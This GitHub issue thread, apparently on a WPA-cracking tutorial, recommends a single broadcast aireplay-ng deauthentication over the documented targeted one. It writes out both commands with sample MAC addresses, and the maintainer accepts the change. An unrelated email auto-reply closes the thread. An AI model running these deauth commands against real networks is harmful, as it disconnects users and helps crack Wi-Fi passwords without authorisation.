### ISSUE TITLE
Broadcast deauth is often better

### ISSUE THREAD

**Issue by cprogrammer1994** [brannondorsey/wifi-cracking#8]
The documentation uses:

```
aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
```

> This method will do 10 deauth against a single client.

---

Consider using this first:

```
aireplay-ng -0 1 -a 9C:5C:8E:C9:AB:C0 mon0
```

> This will do a single broadcast deauth.

You can still use the targeted deauth (there are some devices ignoring the boradcast deauth) but keep the count `1` so the devices can rekey without loosing connection for a noticeable time period.

**Comment by brannondorsey** [comment]
Just updated, thanks for this :smile_cat:

**Comment by vandenbrande** [comment]
Hi, Thank you for contacting us.

This is a confirmation that your e-mail has been received.
We will reply to your e-mail within 24-48 hours.
Have a nice day!

Best regards,

ArduinoSensors.nl
